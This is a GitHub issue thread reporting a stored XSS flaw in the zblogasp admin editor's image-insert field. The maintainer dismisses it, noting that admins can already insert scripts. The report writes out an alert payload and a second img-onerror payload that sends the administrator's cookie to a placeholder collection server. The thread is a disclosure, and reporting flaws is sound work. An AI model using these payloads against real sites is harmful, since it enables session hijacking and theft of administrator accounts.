### ISSUE TITLE
后台富文本编辑器图片上传功能存在XSS漏洞

### ISSUE THREAD

**Issue by 5Laos** [zblogcn/zblogasp#38]
在后台进行文章编辑时，点击多图上传
![image](https://user-images.githubusercontent.com/49939122/106244619-2735c480-6246-11eb-837e-cac34ce5e5c0.png)
选择插入图片，在地址输入以下Payload:`"><img src=1 onerror=alert(document.cookie)>`，就可以触发
![image](https://user-images.githubusercontent.com/49939122/106244726-577d6300-6246-11eb-9bc0-8a67521e6350.png)
保存后，每当管理员进行编辑，就会触发其中的代码
![image](https://user-images.githubusercontent.com/49939122/106244893-914e6980-6246-11eb-9253-b721b3200c29.png)
可以使用以下payload将管理员的Cookie信息窃取发送到指定的服务器
`<img src=1 onerror="var xhttp = new XMLHttpRequest();xhttp.open('GET', 'http://接收数据的地址/' + document.cookie, true);xhttp.send();">`
获取到的Cookie信息
![image](https://user-images.githubusercontent.com/49939122/106245856-2b62e180-6248-11eb-938b-7a33d612d8e1.png)

**Comment by 5Laos** [comment]
源码是使用当前最新版本的，如果有问题，我可以协助修复。

**Comment by zsxsoft** [comment]
毫无意义

**Comment by zsxsoft** [comment]
建议点击左边的“HTML”按钮以直接插入<script>代码
